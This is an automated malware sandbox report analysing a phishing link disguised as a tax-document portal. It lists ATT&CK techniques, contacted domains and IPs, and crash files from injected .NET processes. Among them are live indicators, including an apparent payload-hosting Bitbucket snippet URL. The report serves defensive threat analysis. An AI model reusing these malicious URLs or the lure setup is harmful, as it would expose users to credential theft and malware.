            Source: Yara matchFile source: 00000015.00000002.1903144848.0000000005933000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		Valid Accounts31
            Windows Management Instrumentation            		11
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		12
            File and Directory Discovery            		Remote Services11
            Data from Local System            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            Extra Window Memory Injection            		1
            DLL Side-Loading            		LSASS Memory244
            System Information Discovery            		Remote Desktop ProtocolData from Removable Media1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Command and Scripting Interpreter            		1
            Browser Extensions            		511
            Process Injection            		1
            File Deletion            		Security Account Manager35
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		31
            Registry Run Keys / Startup Folder            		31
            Registry Run Keys / Startup Folder            		1
            Extra Window Memory Injection            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading            		LSA Secrets281
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts281
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items511
            Process Injection            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Rundll32            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Screenshots

            Download Video

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            No bigger version
            No bigger version
            No bigger version
            No bigger version
            No bigger version
            No bigger version
            No bigger version
            No bigger version
            No bigger version
            No bigger version

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf0%Avira URL Cloudsafe

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://securefilepro.netlify.app/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js0%Avira URL Cloudsafe
            https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.js0%Avira URL Cloudsafe
            https://www.securefilepro.com/assets/css/styles.css?v=1.00%Avira URL Cloudsafe
            https://www.securefilepro.com/0%Avira URL Cloudsafe
            https://securefilepro.com/portal/favicon.ico0%Avira URL Cloudsafe
            https://www.securefilepro.com/portal/polyfills.4aee66a14cad3606.js0%Avira URL Cloudsafe
            https://d12bxbf7nz45kt.cloudfront.net/images/landing/anytime.svg0%Avira URL Cloudsafe
            https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/alertify.min.js0%Avira URL Cloudsafe
            https://d12bxbf7nz45kt.cloudfront.net/images/DrakePortals-logo.png0%Avira URL Cloudsafe
            https://www.securefilepro.com/portal/main.690005fd134686e7.js0%Avira URL Cloudsafe
            https://d12bxbf7nz45kt.cloudfront.net/images/landing/send.svg0%Avira URL Cloudsafe
            https://d12bxbf7nz45kt.cloudfront.net/images/landing/relax.svg0%Avira URL Cloudsafe
            https://www.securefilepro.com/_Incapsula_Resource?SWKMTFSR=1&e=0.080989353741057760%Avira URL Cloudsafe
            https://www.securefilepro.com/portal/styles.cc0a641a0c9da1ad.css0%Avira URL Cloudsafe
            https://www.securefilepro.com/favicon.ico0%Avira URL Cloudsafe
            https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/css/alertify.min.css0%Avira URL Cloudsafe
            https://d12bxbf7nz45kt.cloudfront.net/images/landing/get.svg0%Avira URL Cloudsafe
            https://www.securefilepro.com/portal/runtime.5be9c3325b3311c4.js0%Avira URL Cloudsafe
            https://www.securefilepro.com/_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3&ns=1&cb=1230357750%Avira URL Cloudsafe
            https://bitbucket.org/!api/2.0/snippets/ansidjaassdasmjkkkkk/q7MRe8/3fdc148e8846d2e71b5743d242a56ff62d0a4dfc/files/file0%Avira URL Cloudsafe
            https://cpa12-march.blogspot.com/faqeeer.pdf0%Avira URL Cloudsafe
            https://cpa12-march.blogspot.com/atom.xml0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            jsdelivr.map.fastly.net
            		151.101.193.229
            		truefalse
              		high
              bitbucket.org
              		185.166.143.49
              		truefalse
                		high
                chrome.cloudflare-dns.com
                		162.159.61.3
                		truefalse
                  		high
                  beacons3.gvt2.com
                  		142.250.185.195
                  		truefalse
                    		high
                    cdn.jsdelivr.net.cdn.cloudflare.net
                    		104.18.186.31
                    		truefalse
                      		high
                      time.google.com
                      		216.239.35.8
                      		truefalse
                        		unknown
                        ax-0002.ax-msedge.net
                        		150.171.27.11
                        		truefalse
                          		unknown
                          beacons-handoff.gcp.gvt2.com
                          		172.217.16.195
                          		truefalse
                            		high
                            securefilepro.com
                            		45.223.17.158
                            		truefalse
                              		unknown
                              beacons6.gvt2.com
                              		142.250.184.227
                              		truefalse
                                		high
                                gbg1.ntp.netnod.se
                                		194.58.203.20
                                		truefalse
                                  		unknown
                                  cdnjs.cloudflare.com
                                  		104.17.24.14
                                  		truefalse
                                    		high
                                    www.google.com
                                    		142.250.185.132
                                    		truefalse
                                      		high
                                      ntp.time.nl
                                      		94.198.159.14
                                      		truefalse
                                        		unknown
                                        ntp.time.in.ua
                                        		62.149.0.30
                                        		truefalse
                                          		high
                                          blogspot.l.googleusercontent.com
                                          		216.58.206.33
                                          		truefalse
                                            		unknown
                                            beacons2.gvt2.com
                                            		142.250.68.67
                                            		truefalse
                                              		high
                                              beacons.gvt2.com
                                              		142.251.143.35
                                              		truefalse
                                                		high
                                                ntp.nict.jp
                                                		133.243.238.164
                                                		truefalse
                                                  		high
                                                  x.ns.gin.ntt.net
                                                  		129.250.35.250
                                                  		truefalse
                                                    		unknown
                                                    securefilepro.netlify.app
                                                    		3.125.36.175
                                                    		truetrue
                                                      		unknown
                                                      pgl344p.ng.impervadns.net
                                                      		45.223.19.158
                                                      		truefalse
                                                        		unknown
                                                        beacons4.gvt2.com
                                                        		216.239.32.116
                                                        		truefalse
                                                          		high
                                                          d12bxbf7nz45kt.cloudfront.net
                                                          		18.245.46.46
                                                          		truefalse
                                                            		unknown
                                                            ntp1.hetzner.de
                                                            		213.239.239.164
                                                            		truefalse
                                                              		unknown
                                                              cpa12-march.blogspot.com
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown
                                                                cdn.jsdelivr.net
                                                                		unknown
                                                                		unknownfalse
                                                                  		high
                                                                  beacons.gcp.gvt2.com
                                                                  		unknown
                                                                  		unknownfalse
                                                                    		high
                                                                    gbg1.ntp.se
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown
                                                                      www.securefilepro.com
                                                                      		unknown
                                                                      		unknowntrue
                                                                        		unknown

                                                                        Contacted URLs

                                                                        NameMaliciousAntivirus DetectionReputation
                                                                        https://www.securefilepro.com/assets/css/styles.css?v=1.0false
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://cpa12-march.blogspot.com/atom.xmlfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://securefilepro.com/portal/favicon.icofalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/alertify.min.jsfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://d12bxbf7nz45kt.cloudfront.net/images/landing/send.svgfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.securefilepro.com/assets/sfp.htmlfalse
                                                                          		unknown
                                                                          https://www.securefilepro.com/portal/polyfills.4aee66a14cad3606.jsfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.securefilepro.com/portal/main.690005fd134686e7.jsfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdffalse
                                                                            		unknown
                                                                            https://cpa12-march.blogspot.com/faqeeer.pdffalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.securefilepro.com/false
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d12bxbf7nz45kt.cloudfront.net/images/DrakePortals-logo.pngfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                                              		high
                                                                              https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.jsfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://d12bxbf7nz45kt.cloudfront.net/images/landing/anytime.svgfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://d12bxbf7nz45kt.cloudfront.net/images/landing/relax.svgfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.securefilepro.com/favicon.icofalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.securefilepro.com/_Incapsula_Resource?SWKMTFSR=1&e=0.08098935374105776false
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.securefilepro.com/portal/styles.cc0a641a0c9da1ad.cssfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/css/alertify.min.cssfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://securefilepro.netlify.app/true
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.jsfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://d12bxbf7nz45kt.cloudfront.net/images/landing/get.svgfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://bitbucket.org/!api/2.0/snippets/ansidjaassdasmjkkkkk/q7MRe8/3fdc148e8846d2e71b5743d242a56ff62d0a4dfc/files/filefalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.securefilepro.com/portal/runtime.5be9c3325b3311c4.jsfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.securefilepro.com/_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3&ns=1&cb=123035775false
                                                                              • Avira URL Cloud: safe
                                                                              		unknown

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              142.250.185.99
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              194.58.203.20
                                                                              		gbg1.ntp.netnod.seSweden
                                                                              		57021NTP-SEAnycastedNTPservicesfromNetnodIXPsSEfalse
                                                                              142.250.185.206
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              13.107.6.158
                                                                              		unknownUnited States
                                                                              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              94.198.159.14
                                                                              		ntp.time.nlNetherlands
                                                                              		1140SIDNNLfalse
                                                                              216.239.35.8
                                                                              		time.google.comUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              151.101.193.229
                                                                              		jsdelivr.map.fastly.netUnited States
                                                                              		54113FASTLYUSfalse
                                                                              216.58.206.33
                                                                              		blogspot.l.googleusercontent.comUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              185.166.143.49
                                                                              		bitbucket.orgGermany
                                                                              		16509AMAZON-02USfalse
                                                                              104.40.67.19
                                                                              		unknownUnited States
                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              142.251.168.84
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              162.159.61.3
                                                                              		chrome.cloudflare-dns.comUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              45.223.17.158
                                                                              		securefilepro.comUnited States
                                                                              		19551INCAPSULAUSfalse
                                                                              185.208.159.170
                                                                              		unknownSwitzerland
                                                                              		34888SIMPLECARRER2ITtrue
                                                                              18.245.46.46
                                                                              		d12bxbf7nz45kt.cloudfront.netUnited States
                                                                              		16509AMAZON-02USfalse
                                                                              142.250.184.227
                                                                              		beacons6.gvt2.comUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              172.64.41.3
                                                                              		unknownUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              23.199.214.10
                                                                              		unknownUnited States
                                                                              		16625AKAMAI-ASUSfalse
                                                                              142.250.186.35
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              104.17.24.14
                                                                              		cdnjs.cloudflare.comUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              3.125.36.175
                                                                              		securefilepro.netlify.appUnited States
                                                                              		16509AMAZON-02UStrue
                                                                              213.239.239.164
                                                                              		ntp1.hetzner.deGermany
                                                                              		24940HETZNER-ASDEfalse
                                                                              104.18.186.31
                                                                              		cdn.jsdelivr.net.cdn.cloudflare.netUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              62.149.0.30
                                                                              		ntp.time.in.uaUkraine
                                                                              		15497COLOCALLInternetDataCenterColoCALLUAfalse
                                                                              142.250.185.132
                                                                              		www.google.comUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              129.250.35.250
                                                                              		x.ns.gin.ntt.netUnited States
                                                                              		2914NTT-COMMUNICATIONS-2914USfalse
                                                                              13.107.42.16
                                                                              		unknownUnited States
                                                                              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              142.250.185.238
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              216.58.206.46
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              142.251.173.84
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              142.250.185.170
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              142.250.181.227
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              133.243.238.164
                                                                              		ntp.nict.jpJapan9355NICTNationalInstituteofInformationandCommunicationsTefalse
                                                                              142.250.185.196
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              45.223.19.158
                                                                              		pgl344p.ng.impervadns.netUnited States
                                                                              		19551INCAPSULAUSfalse
                                                                              172.217.18.106
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              150.171.27.11
                                                                              		ax-0002.ax-msedge.netUnited States
                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              142.250.186.142
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              85.215.93.134
                                                                              		unknownGermany
                                                                              		6724STRATOSTRATOAGDEfalse
                                                                              142.250.184.238
                                                                              		unknownUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              104.17.25.14
                                                                              		unknownUnited States
                                                                              		13335CLOUDFLARENETUSfalse

                                                                              Private

                                                                              IP
                                                                              192.168.2.16
                                                                              192.168.2.5
                                                                              127.0.0.1

                                                                              General Information

                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                              Analysis ID:1638776
                                                                              Start date and time:2025-03-14 18:33:21 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                              Sample URL:https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:53
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:1
                                                                              Technologies:
                                                                              • EGA enabled
                                                                              Analysis Mode:stream
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.expl.evad.win@91/58@92/214
                                                                              • Exclude process from analysis (whitelisted): svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 142.250.186.142, 142.250.184.227, 142.250.185.174, 142.251.168.84, 142.250.186.174, 142.250.181.238
                                                                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • Timeout during stream target processing, analysis might miss dynamic analysis data
                                                                              • VT rate limit hit for: https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf

                                                                              Created / dropped Files

                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_19518d53-9e9b-49a6-ac05-5deb2f31a6d5\Report.wer

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8026733441696363
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:DECA99C218DA5B999DE16DC74EB1F93A
                                                                              SHA1:E16C84E8355FAFC802E13BB1F1FB3F7EF3E71669
                                                                              SHA-256:E08A3642C476EA611CE73D721497F5BFDB575C670F2F04AA06D12CDA8A5ADA83
                                                                              SHA-512:137194C266764969BBA52E543E2F1D2F3CC5685845942C543CB8B299058F5347BE79F8231D1FB8BB693F2EACDCD005E716234B10193AE82B6B939D722C70D73C
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.1.6.7.8.3.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.8.6.5.8.1.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.5.1.8.d.5.3.-.9.e.9.b.-.4.9.a.6.-.a.c.0.5.-.5.d.e.b.2.f.3.1.a.6.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.d.0.-.0.0.0.1.-.0.0.1.9.-.0.0.e.3.-.a.9.6.c.0.7.9.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.3.5.3.8.8.1.e.7.f.4.e.9.c.7.6.1.0.f.4.e.0.4.8.9.1.8.3.b.5.5.b.b.5.8.b.b.5.7.4.!.M.S.B.u.i.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.4.:.1.8.:.5.7.!.1.d.d.5.0.!.M.S.B.u.i.l.d...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_ca4543f3-b4d4-434c-9ded-18368e2bbc89\Report.wer

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8026205586342221
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:791AF94847AAA33814392FE9C8A55B88
                                                                              SHA1:9BC14CD195E57DB794A259A5B2FB17D22A05D0AF
                                                                              SHA-256:D05715B9F0495C66CBC3D8265BE89B99C0348A2F3B9211EB6A8E7C7E4AEC7D34
                                                                              SHA-512:4986B7A6CC711C70AFBF27ED73706C989D399F7B0D8055AD42B2734F35EFB66DE951308C30EBBCB22DD7BD5A2E6124E5F5471D0BBE5B407731640C8BAB05A3CD
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.2.4.8.6.3.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.9.4.5.6.3.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.a.4.5.4.3.f.3.-.b.4.d.4.-.4.3.4.c.-.9.d.e.d.-.1.8.3.6.8.e.2.b.b.c.8.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.0.-.0.0.0.1.-.0.0.1.9.-.6.4.0.3.-.a.2.6.c.0.7.9.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.3.5.3.8.8.1.e.7.f.4.e.9.c.7.6.1.0.f.4.e.0.4.8.9.1.8.3.b.5.5.b.b.5.8.b.b.5.7.4.!.M.S.B.u.i.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.4.:.1.8.:.5.7.!.1.d.d.5.0.!.M.S.B.u.i.l.d...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_31724cce-707c-460d-90d7-92dac81b32a4\Report.wer

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8907714329991707
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:8AFA6700971220253686FBB0F8D73C81
                                                                              SHA1:B40DA2DE66F596BEABFA6E7EFB1A311B5E8E253D
                                                                              SHA-256:BE9EB2509FBA3AEA83B56A8D25A2642DA5E966495593E747C993FE40D0AB129F
                                                                              SHA-512:14ABA8C7310A2C3B97EF2837818278A59203589FBAC15410DB29FAC014EECCC930E6150031A590960FE1A4E87AABEACC51E1177EACED94660F52A91018686FB7
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.0.9.0.7.3.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.8.1.8.7.0.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.7.2.4.c.c.e.-.7.0.7.c.-.4.6.0.d.-.9.0.d.7.-.9.2.d.a.c.8.1.b.3.2.a.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.8.-.0.0.0.1.-.0.0.1.9.-.4.c.2.a.-.9.a.6.c.0.7.9.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.9.6.f.a.7.2.6.f.c.8.4.f.d.4.6.d.0.3.d.d.3.c.3.2.6.8.9.f.6.4.5.e.0.4.2.2.2.7.8.!.R.e.g.S.v.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.9.:.0.1.:.0.0.!.1.5.0.b.1.!.R.e.g.S.v.c.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_9117b85e-4082-4d3b-a9cb-b8c111d37a89\Report.wer

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8908946362813499
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:4C16A5DB5D745E00EE8F91BD2E6A0BDB
                                                                              SHA1:47C5488C0339135C5C207EE4B2C783D00C89F176
                                                                              SHA-256:CEFA5545C7F55993A1490B814069522921EFDC3C7CAECF925D72F233FE451722
                                                                              SHA-512:9008BAD2EF160ACBE6D7E72BB8416B8C17554BD63EF9A7D552AD60DB7B0D9E1AAA298AF3DC5B6918C90507A3D6A44AE51A191AFC6B177A856C01C20654BA4498
                                                                              Malicious:false
                                                                              Reputation:unknown
